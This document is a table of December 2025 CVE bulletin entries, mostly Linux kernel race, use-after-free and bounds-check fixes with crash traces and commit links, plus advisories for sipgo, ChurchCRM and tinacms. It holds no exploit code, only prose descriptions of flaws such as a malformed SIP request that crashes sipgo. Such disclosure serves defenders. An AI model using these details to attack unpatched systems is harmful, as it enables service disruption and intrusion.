| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() Fix a race between inline data destruction and block mapping. The function ext4_destroy_inline_data_nolock() changes the inode data layout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS. At the same time, another thread may execute ext4_map_blocks(), which tests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks() or ext4_ind_map_blocks(). Without i_data_sem protection, ext4_ind_map_blocks() may receive an inode with the EXT4_INODE_EXTENTS flag set and trigger the assert. kernel BUG at fs/ext4/indirect.c:546! EXT4-fs (loop2): unmounting filesystem. invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 RIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546 Call Trace: <TASK> ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681 _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822 ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124 ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255 ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000 generic_perform_write+0x259/0x5d0 mm/filemap.c:3846 ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285 ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679 call_write_iter include/linux/fs.h:2271 [inline] do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735 do_iter_write+0x186/0x710 fs/read_write.c:861 vfs_iter_write+0x70/0xa0 fs/read_write.c:902 iter_file_splice_write+0x73b/0xc90 fs/splice.c:685 do_splice_from fs/splice.c:763 [inline] direct_splice_actor+0x10f/0x170 fs/splice.c:950 splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896 do_splice_direct+0x1a9/0x280 fs/splice.c:1002 do_sendfile+0xb13/0x12c0 fs/read_write.c:1255 __do_sys_sendfile64 fs/read_write.c:1323 [inline] __se_sys_sendfile64 fs/read_write.c:1309 [inline] __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 | 2025-12-16 | not yet calculated | CVE-2025-68261 | https://git.kernel.org/stable/c/22a76b0861ae61a299c8e126c1aca8c4fda820fd https://git.kernel.org/stable/c/ba8aeff294ac7ff6dfe293663d815c54c5ee218c https://git.kernel.org/stable/c/5cad18e527ba8a9ca5463cc170073eeb5a4826f4 https://git.kernel.org/stable/c/0cd8feea8777f8d9b9a862b89c688b049a5c8475 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: zstd - fix double-free in per-CPU stream cleanup The crypto/zstd module has a double-free bug that occurs when multiple tfms are allocated and freed. The issue happens because zstd_streams (per-CPU contexts) are freed in zstd_exit() during every tfm destruction, rather than being managed at the module level. When multiple tfms exist, each tfm exit attempts to free the same shared per-CPU streams, resulting in a double-free. This leads to a stack trace similar to: BUG: Bad page state in process kworker/u16:1 pfn:106fd93 page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106fd93 flags: 0x17ffffc0000000(node=0|zone=2|lastcpupid=0x1fffff) page_type: 0xffffffff() raw: 0017ffffc0000000 dead000000000100 dead000000000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: nonzero entire_mapcount Modules linked in: ... CPU: 3 UID: 0 PID: 2506 Comm: kworker/u16:1 Kdump: loaded Tainted: G B Hardware name: ... Workqueue: btrfs-delalloc btrfs_work_helper Call Trace: <TASK> dump_stack_lvl+0x5d/0x80 bad_page+0x71/0xd0 free_unref_page_prepare+0x24e/0x490 free_unref_page+0x60/0x170 crypto_acomp_free_streams+0x5d/0xc0 crypto_acomp_exit_tfm+0x23/0x50 crypto_destroy_tfm+0x60/0xc0 ... Change the lifecycle management of zstd_streams to free the streams only once during module cleanup. | 2025-12-16 | not yet calculated | CVE-2025-68262 | https://git.kernel.org/stable/c/dc0f4509b0ed5d82bef78e058db0ac4df04d0695 https://git.kernel.org/stable/c/e983feaa79de1e46c9087fb9f02fedb0e5397ce6 https://git.kernel.org/stable/c/48bc9da3c97c15f1ea24934bcb3b736acd30163d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: ipc: fix use-after-free in ipc_msg_send_request ipc_msg_send_request() waits for a generic netlink reply using an ipc_msg_table_entry on the stack. The generic netlink handler (handle_generic_event()/handle_response()) fills entry->response under ipc_msg_table_lock, but ipc_msg_send_request() used to validate and free entry->response without holding the same lock. Under high concurrency this allows a race where handle_response() is copying data into entry->response while ipc_msg_send_request() has just freed it, leading to a slab-use-after-free reported by KASAN in handle_generic_event(): BUG: KASAN: slab-use-after-free in handle_generic_event+0x3c4/0x5f0 [ksmbd] Write of size 12 at addr ffff888198ee6e20 by task pool/109349 ... Freed by task: kvfree ipc_msg_send_request [ksmbd] ksmbd_rpc_open -> ksmbd_session_rpc_open [ksmbd] Fix by: - Taking ipc_msg_table_lock in ipc_msg_send_request() while validating entry->response, freeing it when invalid, and removing the entry from ipc_msg_table. - Returning the final entry->response pointer to the caller only after the hash entry is removed under the lock. - Returning NULL in the error path, preserving the original API semantics. This makes all accesses to entry->response consistent with handle_response(), which already updates and fills the response buffer under ipc_msg_table_lock, and closes the race that allowed the UAF. | 2025-12-16 | not yet calculated | CVE-2025-68263 | https://git.kernel.org/stable/c/5ac763713a1ef8f9a8bda1dbd81f0318d67baa4e https://git.kernel.org/stable/c/759c8c30cfa8706c518e56f67971b1f0932f4b9b https://git.kernel.org/stable/c/8229c6ca50cea701e25a7ee25f48441b582ec5fa https://git.kernel.org/stable/c/1fab1fa091f5aa97265648b53ea031deedd26235 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: refresh inline data size before write operations The cached ei->i_inline_size can become stale between the initial size check and when ext4_update_inline_data()/ext4_create_inline_data() use it. Although ext4_get_max_inline_size() reads the correct value at the time of the check, concurrent xattr operations can modify i_inline_size before ext4_write_lock_xattr() is acquired. This causes ext4_update_inline_data() and ext4_create_inline_data() to work with stale capacity values, leading to a BUG_ON() crash in ext4_write_inline_data(): kernel BUG at fs/ext4/inline.c:1331! BUG_ON(pos + len > EXT4_I(inode)->i_inline_size); The race window: 1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct) 2. Size check passes for 50-byte write 3. [Another thread adds xattr, i_inline_size changes to 40] 4. ext4_write_lock_xattr() acquires lock 5. ext4_update_inline_data() uses stale i_inline_size = 60 6. Attempts to write 50 bytes but only 40 bytes actually available 7. BUG_ON() triggers Fix this by recalculating i_inline_size via ext4_find_inline_data_nolock() immediately after acquiring xattr_sem. This ensures ext4_update_inline_data() and ext4_create_inline_data() work with current values that are protected from concurrent modifications. This is similar to commit a54c4613dac1 ("ext4: fix race writing to an inline_data file while its xattrs are changing") which fixed i_inline_off staleness. This patch addresses the related i_inline_size staleness issue. | 2025-12-16 | not yet calculated | CVE-2025-68264 | https://git.kernel.org/stable/c/210ac60a86a3ad2c76ae60e0dc71c34af6e7ea0b https://git.kernel.org/stable/c/ca43ea29b4c4d2764aec8a26cffcfb677a871e6e https://git.kernel.org/stable/c/58df743faf21ceb1880f930aa5dd428e2a5e415d https://git.kernel.org/stable/c/892e1cf17555735e9d021ab036c36bc7b58b0e3b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme: fix admin request_queue lifetime The namespaces can access the controller's admin request_queue, and stale references on the namespaces may exist after tearing down the controller. Ensure the admin request_queue is active by moving the controller's 'put' to after all controller references have been released to ensure no one can access the request_queue. This fixes a reported use-after-free bug: BUG: KASAN: slab-use-after-free in blk_queue_enter+0x41c/0x4a0 Read of size 8 at addr ffff88c0a53819f8 by task nvme/3287 CPU: 67 UID: 0 PID: 3287 Comm: nvme Tainted: G E 6.13.2-ga1582f1a031e #15 Tainted: [E]=UNSIGNED_MODULE Hardware name: Jabil /EGS 2S MB1, BIOS 1.00 06/18/2025 Call Trace: <TASK> dump_stack_lvl+0x4f/0x60 print_report+0xc4/0x620 ? _raw_spin_lock_irqsave+0x70/0xb0 ? _raw_read_unlock_irqrestore+0x30/0x30 ? blk_queue_enter+0x41c/0x4a0 kasan_report+0xab/0xe0 ? blk_queue_enter+0x41c/0x4a0 blk_queue_enter+0x41c/0x4a0 ? __irq_work_queue_local+0x75/0x1d0 ? blk_queue_start_drain+0x70/0x70 ? irq_work_queue+0x18/0x20 ? vprintk_emit.part.0+0x1cc/0x350 ? wake_up_klogd_work_func+0x60/0x60 blk_mq_alloc_request+0x2b7/0x6b0 ? __blk_mq_alloc_requests+0x1060/0x1060 ? __switch_to+0x5b7/0x1060 nvme_submit_user_cmd+0xa9/0x330 nvme_user_cmd.isra.0+0x240/0x3f0 ? force_sigsegv+0xe0/0xe0 ? nvme_user_cmd64+0x400/0x400 ? vfs_fileattr_set+0x9b0/0x9b0 ? cgroup_update_frozen_flag+0x24/0x1c0 ? cgroup_leave_frozen+0x204/0x330 ? nvme_ioctl+0x7c/0x2c0 blkdev_ioctl+0x1a8/0x4d0 ? blkdev_common_ioctl+0x1930/0x1930 ? fdget+0x54/0x380 __x64_sys_ioctl+0x129/0x190 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f765f703b0b Code: ff ff ff 85 c0 79 9b 49 c7 c4 ff ff ff ff 5b 5d 4c 89 e0 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d dd 52 0f 00 f7 d8 64 89 01 48 RSP: 002b:00007ffe2cefe808 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007ffe2cefe860 RCX: 00007f765f703b0b RDX: 00007ffe2cefe860 RSI: 00000000c0484e41 RDI: 0000000000000003 RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000 R10: 00007f765f611d50 R11: 0000000000000202 R12: 0000000000000003 R13: 00000000c0484e41 R14: 0000000000000001 R15: 00007ffe2cefea60 </TASK> | 2025-12-16 | not yet calculated | CVE-2025-68265 | https://git.kernel.org/stable/c/e8061d02b49c5c901980f58d91e96580e9a14acf https://git.kernel.org/stable/c/e7dac681790556c131854b97551337aa8042215b https://git.kernel.org/stable/c/03b3bcd319b3ab5182bc9aaa0421351572c78ac0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bfs: Reconstruct file type when loading from disk syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when the S_IFMT bits of the 32bits "mode" field loaded from disk are corrupted or when the 32bits "attributes" field loaded from disk are corrupted. Documentation says that BFS uses only the lower 9 bits of the "mode" field. But I can't find an explicit explanation that the unused upper 23 bits (especially, the S_IFMT bits) are initialized with 0. Therefore, ignore the S_IFMT bits of the "mode" field loaded from disk. Also, verify that the value of the "attributes" field loaded from disk is either BFS_VREG or BFS_VDIR (because BFS supports only regular files and the root directory). | 2025-12-16 | not yet calculated | CVE-2025-68266 | https://git.kernel.org/stable/c/77899444d46162aeb65f229590c26ba266864223 https://git.kernel.org/stable/c/a8cb796e7e2cb7971311ba236922f5e7e1be77e6 https://git.kernel.org/stable/c/34ab4c75588c07cca12884f2bf6b0347c7a13872 |
| emiago--sipgo | SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability exists in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling, not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue. | 2025-12-16 | not yet calculated | CVE-2025-68274 | https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a stored cross-site scripting vulnerability on the pages `View Active People`, `View Inactive people`, and `View All People`. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68275 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3q97-q4hv-gxwr |
| tinacms--tinacms | Tina is a headless content management system. In tinacms prior to version 3.1.1, tinacms uses the gray-matter package in an insecure way allowing attackers that can control the content of the processed markdown files, e.g., blog posts, to execute arbitrary code. tinacms version 3.1.1, @tinacms/cli version 2.0.4, and @tinacms/graphql version 2.0.3 contain a fix for the issue. | 2025-12-18 | not yet calculated | CVE-2025-68278 | https://github.com/tinacms/tinacms/security/advisories/GHSA-529f-9qwm-9628 https://github.com/tinacms/tinacms/commit/fa7c27abef968e3f3a3e7d564f282bc566087569 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SDCA: bug fix while parsing mipi-sdca-control-cn-list "struct sdca_control" declares the "values" field as an integer array, but the memory allocated to it is sized for a char array. This causes a crash in the sdca_parse_function API. This patch addresses the issue by allocating the correct data size. | 2025-12-16 | not yet calculated | CVE-2025-68281 | https://git.kernel.org/stable/c/fcd5786b506c51cbabc2560c68e040d8dba22a0d https://git.kernel.org/stable/c/eb2d6774cc0d9d6ab8f924825695a85c14b2e0c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: udc: fix use-after-free in usb_gadget_state_work A race condition during gadget teardown can lead to a use-after-free in usb_gadget_state_work(), as reported by KASAN: BUG: KASAN: invalid-access in sysfs_notify+0x2c/0xd0 Workqueue: events usb_gadget_state_work The fundamental race occurs because a concurrent event (e.g., an interrupt) can call usb_gadget_set_state() and schedule gadget->work at any time during the cleanup process in usb_del_gadget(). Commit 399a45e5237c ("usb: gadget: core: flush gadget workqueue after device removal") attempted to fix this by moving flush_work() to after device_del(). However, this does not fully solve the race, as a new work item can still be scheduled *after* flush_work() completes but before the gadget's memory is freed, leading to the same use-after-free. This patch fixes the race condition robustly by introducing a 'teardown' flag and a 'state_lock' spinlock to the usb_gadget struct. The flag is set during cleanup in usb_del_gadget() *before* calling flush_work() to prevent any new work from being scheduled once cleanup has commenced. The scheduling site, usb_gadget_set_state(), now checks this flag under the lock before queueing the work, thus safely closing the race window. | 2025-12-16 | not yet calculated | CVE-2025-68282 | https://git.kernel.org/stable/c/c12a0c3ef815ddd67e47f9c819f9fe822fed5467 https://git.kernel.org/stable/c/f02a412c0a18f02f0f91b0a3d9788315a721b7fd https://git.kernel.org/stable/c/10014310193cf6736c1aeb4105c5f4a0818d0c65 https://git.kernel.org/stable/c/3b32caa73d135eea8fb9cabb45e9fc64c5a3ecb9 https://git.kernel.org/stable/c/baeb66fbd4201d1c4325074e78b1f557dff89b5b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: replace BUG_ON with bounds check for map->max_osd OSD indexes come from untrusted network packets. Boundary checks are added to validate these against map->max_osd. [ idryomov: drop BUG_ON in ceph_get_primary_affinity(), minor cosmetic edits ] | 2025-12-16 | not yet calculated | CVE-2025-68283 | https://git.kernel.org/stable/c/57f5fbae9f1024aba17ff75e00433324115c548a https://git.kernel.org/stable/c/becc488a4d864db338ebd4e313aa3c77da24b604 https://git.kernel.org/stable/c/e67e3be690f5f7e3b031cf29e8d91e6d02a8e30d https://git.kernel.org/stable/c/b4368b7f97014e1015445d61abd0b27c4c6e8424 https://git.kernel.org/stable/c/ec3797f043756a94ea2d0f106022e14ac4946c02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() The len field originates from untrusted network packets. Boundary checks have been added to prevent potential out-of-bounds writes when decrypting the connection secret or processing service tickets. [ idryomov: changelog ] | 2025-12-16 | not yet calculated | CVE-2025-68284 | https://git.kernel.org/stable/c/f22c55a20a2d9ffbbac57408d5d488cef8201e9d https://git.kernel.org/stable/c/8dfcc56af28cffb8f25fb9be37b3acc61f2a3d09 https://git.kernel.org/stable/c/ccbccfba25e9aa395daaea156b5e7790910054c4 https://git.kernel.org/stable/c/5ef575834ca99f719d7573cdece9df2fe2b72424 https://git.kernel.org/stable/c/6920ff09bf911bc919cd7a6b7176fbdd1a6e6850 https://git.kernel.org/stable/c/7fce830ecd0a0256590ee37eb65a39cbad3d64fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: fix potential use-after-free in have_mon_and_osd_map() The wait loop in __ceph_open_session() can race with the client receiving a new monmap or osdmap shortly after the initial map is received. Both ceph_monc_handle_map() and handle_one_map() install a new map immediately after freeing the old one kfree(monc->monmap); monc->monmap = monmap; ceph_osdmap_destroy(osdc->osdmap); osdc->osdmap = newmap; under client->monc.mutex and client->osdc.lock respectively, but because neither is taken in have_mon_and_osd_map() it's possible for client->monc.monmap->epoch and client->osdc.osdmap->epoch arms in client->monc.monmap && client->monc.monmap->epoch && client->osdc.osdmap && client->osdc.osdmap->epoch; condition to dereference an already freed map. This happens to be reproducible with generic/395 and generic/397 with KASAN enabled: BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70 Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305 CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266 ... Call Trace: <TASK> have_mon_and_osd_map+0x56/0x70 ceph_open_session+0x182/0x290 ceph_get_tree+0x333/0x680 vfs_get_tree+0x49/0x180 do_new_mount+0x1a3/0x2d0 path_mount+0x6dd/0x730 do_mount+0x99/0xe0 __do_sys_mount+0x141/0x180 do_syscall_64+0x9f/0x100 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> Allocated by task 13305: ceph_osdmap_alloc+0x16/0x130 ceph_osdc_init+0x27a/0x4c0 ceph_create_client+0x153/0x190 create_fs_client+0x50/0x2a0 ceph_get_tree+0xff/0x680 vfs_get_tree+0x49/0x180 do_new_mount+0x1a3/0x2d0 path_mount+0x6dd/0x730 do_mount+0x99/0xe0 __do_sys_mount+0x141/0x180 do_syscall_64+0x9f/0x100 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 9475: kfree+0x212/0x290 handle_one_map+0x23c/0x3b0 ceph_osdc_handle_map+0x3c9/0x590 mon_dispatch+0x655/0x6f0 ceph_con_process_message+0xc3/0xe0 ceph_con_v1_try_read+0x614/0x760 ceph_con_workfn+0x2de/0x650 process_one_work+0x486/0x7c0 process_scheduled_works+0x73/0x90 worker_thread+0x1c8/0x2a0 kthread+0x2ec/0x300 ret_from_fork+0x24/0x40 ret_from_fork_asm+0x1a/0x30 Rewrite the wait loop to check the above condition directly with client->monc.mutex and client->osdc.lock taken as appropriate. While at it, improve the timeout handling (previously mount_timeout could be exceeded in case wait_event_interruptible_timeout() slept more than once) and access client->auth_err under client->monc.mutex to match how it's set in finish_auth(). monmap_show() and osdmap_show() now take the respective lock before accessing the map as well. | 2025-12-16 | not yet calculated | CVE-2025-68285 | https://git.kernel.org/stable/c/bb4910c5fd436701faf367e1b5476a5a6d2aff1c https://git.kernel.org/stable/c/05ec43e9a9de67132dc8cd3b22afef001574947f https://git.kernel.org/stable/c/7c8ccdc1714d9fabecd26e1be7db1771061acc6e https://git.kernel.org/stable/c/183ad6e3b651e8fb0b66d6a2678f4b80bfbba092 https://git.kernel.org/stable/c/e08021b3b56b2407f37b5fe47b654be80cc665fb https://git.kernel.org/stable/c/3fc43120b22a3d4f1fbeff56a35ce2105b6a5683 https://git.kernel.org/stable/c/076381c261374c587700b3accf410bdd2dba334e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check NULL before accessing [WHAT] IGT kms_cursor_legacy's long-nonblocking-modeset-vs-cursor-atomic fails with NULL pointer dereference. This can be reproduced with both an eDP panel and a DP monitors connected. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 13 UID: 0 PID: 2960 Comm: kms_cursor_lega Not tainted 6.16.0-99-custom #8 PREEMPT(voluntary) Hardware name: AMD ........ RIP: 0010:dc_stream_get_scanoutpos+0x34/0x130 [amdgpu] Code: 57 4d 89 c7 41 56 49 89 ce 41 55 49 89 d5 41 54 49 89 fc 53 48 83 ec 18 48 8b 87 a0 64 00 00 48 89 75 d0 48 c7 c6 e0 41 30 c2 <48> 8b 38 48 8b 9f 68 06 00 00 e8 8d d7 fd ff 31 c0 48 81 c3 e0 02 RSP: 0018:ffffd0f3c2bd7608 EFLAGS: 00010292 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffd0f3c2bd7668 RDX: ffffd0f3c2bd7664 RSI: ffffffffc23041e0 RDI: ffff8b32494b8000 RBP: ffffd0f3c2bd7648 R08: ffffd0f3c2bd766c R09: ffffd0f3c2bd7760 R10: ffffd0f3c2bd7820 R11: 0000000000000000 R12: ffff8b32494b8000 R13: ffffd0f3c2bd7664 R14: ffffd0f3c2bd7668 R15: ffffd0f3c2bd766c FS: 000071f631b68700(0000) GS:ffff8b399f114000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000001b8105000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> dm_crtc_get_scanoutpos+0xd7/0x180 [amdgpu] amdgpu_display_get_crtc_scanoutpos+0x86/0x1c0 [amdgpu] ? __pfx_amdgpu_crtc_get_scanout_position+0x10/0x10[amdgpu] amdgpu_crtc_get_scanout_position+0x27/0x50 [amdgpu] drm_crtc_vblank_helper_get_vblank_timestamp_internal+0xf7/0x400 drm_crtc_vblank_helper_get_vblank_timestamp+0x1c/0x30 drm_crtc_get_last_vbltimestamp+0x55/0x90 drm_crtc_next_vblank_start+0x45/0xa0 drm_atomic_helper_wait_for_fences+0x81/0x1f0 ... (cherry picked from commit 621e55f1919640acab25383362b96e65f2baea3c) | 2025-12-16 | not yet calculated | CVE-2025-68286 | https://git.kernel.org/stable/c/781f2f32e9c19eb791b52af283c96f9a9677a7f2 https://git.kernel.org/stable/c/09092269cb762378ca8b56024746b1a136761e0d https://git.kernel.org/stable/c/109e9c92543f3105e8e1efd2c5e6b92ef55d5743 https://git.kernel.org/stable/c/9d1a65cbe3ec5da3003c8434ac7a38dcdc958fd9 https://git.kernel.org/stable/c/f7cf491cd5b54b5a093bd3fdf76fa2860a7522bf https://git.kernel.org/stable/c/62150f1e7ec707da76ff353fb7db51fef9cd6557 https://git.kernel.org/stable/c/3ce62c189693e8ed7b3abe551802bbc67f3ace54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths This patch addresses a race condition caused by unsynchronized execution of multiple call paths invoking `dwc3_remove_requests()`, leading to premature freeing of USB requests and subsequent crashes. Three distinct execution paths interact with `dwc3_remove_requests()`: Path 1: Triggered via `dwc3_gadget_reset_interrupt()` during USB reset handling. The call stack includes: - `dwc3_ep0_reset_state()` - `dwc3_ep0_stall_and_restart()` - `dwc3_ep0_out_start()` - `dwc3_remove_requests()` - `dwc3_gadget_del_and_unmap_request()` Path 2: Also initiated from `dwc3_gadget_reset_interrupt()`, but through `dwc3_stop_active_transfers()`. The call stack includes: - `dwc3_stop_active_transfers()` - `dwc3_remove_requests()` - `dwc3_gadget_del_and_unmap_request()` Path 3: Occurs independently during `adb root` execution, which triggers USB function unbind and bind operations. The sequence includes: - `gserial_disconnect()` - `usb_ep_disable()` - `dwc3_gadget_ep_disable()` - `dwc3_remove_requests()` with `-ESHUTDOWN` status Path 3 operates asynchronously and lacks synchronization with Paths 1 and 2. When Path 3 completes, it disables endpoints and frees 'out' requests. If Paths 1 or 2 are still processing these requests, accessing freed memory leads to a crash due to use-after-free conditions. To fix this, add a check for request completion and skip processing if already completed, and set the request status for ep0 while queueing. | 2025-12-16 | not yet calculated | CVE-2025-68287 | https://git.kernel.org/stable/c/467add9db13219101f14b6cc5477998b4aaa5fe2 https://git.kernel.org/stable/c/67192e8cb7f941b5bba91e4bb290683576ce1607 https://git.kernel.org/stable/c/47de14d741cc4057046c9e2f33df1f7828254e6c https://git.kernel.org/stable/c/afc0e34f161ce61ad351303c46eb57bd44b8b090 https://git.kernel.org/stable/c/7cfb62888eba292fa35cd9ddbd28ce595f60e139 https://git.kernel.org/stable/c/fa5eaf701e576880070b60922200557ae4aa54e1 https://git.kernel.org/stable/c/e4037689a366743c4233966f0e74bc455820d316 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: storage: Fix memory leak in USB bulk transport A kernel memory leak was identified by the 'ioctl_sg01' test from Linux Test Project (LTP). The following bytes were mainly observed: 0x53425355. When USB storage devices incorrectly skip the data phase with status data, the code extracts/validates the CSW from the sg buffer, but fails to clear it afterwards. This leaves status protocol data in srb's transfer buffer, such as the US_BULK_CS_SIGN 'USBS' signature observed here. Thus, this can lead to USB protocols leaks to user space through SCSI generic (/dev/sg*) interfaces, such as the one seen here when the LTP test requested 512 KiB. Fix the leak by zeroing the CSW data in srb's transfer buffer immediately after the validation of devices that skip data phase. Note: Differently from CVE-2018-1000204, which fixed a big leak by zeroing pages at allocation time, this leak occurs after allocation, when USB protocol data is written to already-allocated sg pages. | 2025-12-16 | not yet calculated | CVE-2025-68288 | https://git.kernel.org/stable/c/83f0241959831586d9b6d47f6bd5d3dec8f43bf0 https://git.kernel.org/stable/c/4ba515dfff7eeca369ab85cdbb3f3b231c71720c https://git.kernel.org/stable/c/467fec3cefbeb9e3ea80f457da9a5666a71ca0d0 https://git.kernel.org/stable/c/cb1401b5bcc2feb5b038fc4b512e5968b016e05e https://git.kernel.org/stable/c/0f18eac44c5668204bf6eebb01ddb369ac56932b https://git.kernel.org/stable/c/5b815ddb3f5560fac35b16de3a2a22d5f81c5993 https://git.kernel.org/stable/c/41e99fe2005182139b1058db71f0d241f8f0078c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_eem: Fix memory leak in eem_unwrap The existing code did not handle the failure case of usb_ep_queue in the command path, potentially leading to memory leaks. Improve error handling to free all allocated resources on usb_ep_queue failure. This patch continues to use goto logic for error handling, as the existing error handling is complex and not easily adaptable to auto-cleanup helpers. kmemleak results: unreferenced object 0xffffff895a512300 (size 240): backtrace: slab_post_alloc_hook+0xbc/0x3a4 kmem_cache_alloc+0x1b4/0x358 skb_clone+0x90/0xd8 eem_unwrap+0x1cc/0x36c unreferenced object 0xffffff8a157f4000 (size 256): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc kmalloc_trace+0x48/0x140 dwc3_gadget_ep_alloc_request+0x58/0x11c usb_ep_alloc_request+0x40/0xe4 eem_unwrap+0x204/0x36c unreferenced object 0xffffff8aadbaac00 (size 128): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc __kmalloc+0x64/0x1a8 eem_unwrap+0x218/0x36c unreferenced object 0xffffff89ccef3500 (size 64): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc kmalloc_trace+0x48/0x140 eem_unwrap+0x238/0x36c | 2025-12-16 | not yet calculated | CVE-2025-68289 | https://git.kernel.org/stable/c/a9985a88b2fc29fbe1657fe8518908e261d6889c https://git.kernel.org/stable/c/5a1628283cd9dccf1e44acfb74e77504f4dc7472 https://git.kernel.org/stable/c/0ac07e476944a5e4c2b8b087dd167dec248c1bdf https://git.kernel.org/stable/c/41434488ca714ab15cb2a4d0378418d1be8052d2 https://git.kernel.org/stable/c/e72c963177c708a167a7e17ed6c76320815157cf https://git.kernel.org/stable/c/0dea2e0069a7e9aa034696f8065945b7be6dd6b7 https://git.kernel.org/stable/c/e4f5ce990818d37930cd9fb0be29eee0553c59d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: fix double free on late probe failure The MOST subsystem has a non-standard registration function which frees the interface on registration failures and on deregistration. This unsurprisingly leads to bugs in the MOST drivers, and a couple of recent changes turned a reference underflow and use-after-free in the USB driver into several double frees and a use-after-free on late probe failures. | 2025-12-16 | not yet calculated | CVE-2025-68290 | https://git.kernel.org/stable/c/90e6ce2b1b19fb8b9d4afee69f40e4c6a4791154 https://git.kernel.org/stable/c/a4c4118c2af284835b16431bbfe77e0130c06fef https://git.kernel.org/stable/c/0dece48660be16918ecf2dbdc7193e8be03e1693 https://git.kernel.org/stable/c/993bfdc3842893c394de13c8200c338ebb979589 https://git.kernel.org/stable/c/2274767dc02b756b25e3db1e31c0ed47c2a78442 https://git.kernel.org/stable/c/8d8ffefe3d5d8b7b73efb866db61130107299c5c https://git.kernel.org/stable/c/baadf2a5c26e802a46573eaad331b427b49aaa36 |
